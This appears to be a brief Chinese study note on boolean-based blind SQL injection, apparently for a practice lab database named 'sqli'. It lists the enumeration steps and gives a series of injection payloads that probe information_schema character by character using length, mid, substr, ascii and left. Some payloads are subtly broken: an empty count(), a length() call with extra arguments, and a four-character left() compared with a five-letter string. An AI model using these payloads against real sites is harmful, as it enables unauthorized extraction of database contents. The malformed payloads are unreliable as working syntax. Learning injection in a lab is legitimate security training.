步骤:猜数据库名字长度--猜数据库名字 --猜表单数量--猜表单名字长度 --猜表单名字--猜字段数量--猜字段长度--猜字段
1 and length(database())>3
1 and mid(database(),1,1)='a' //用substr函数也行
1 and ascii(substr((select database()),1,1))='数字'
1 and left(database(),4)='sqli' //判断字符串
1 and 1=((select count() from information_schema.tables where table_schema='sqli')<3)
1 and length((select table_name from information_schema.tables where table_schema='sqli'),0,1)=3
1 and mid((select table_name from information_schema.tables where table_schema='sqli'),1,1)='s'
1 and left((select table_name from information_schema.tables where table_schema='sqli'),4)='sqlli'
1 and ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),1,1)='数字'
以下的操作都是同理了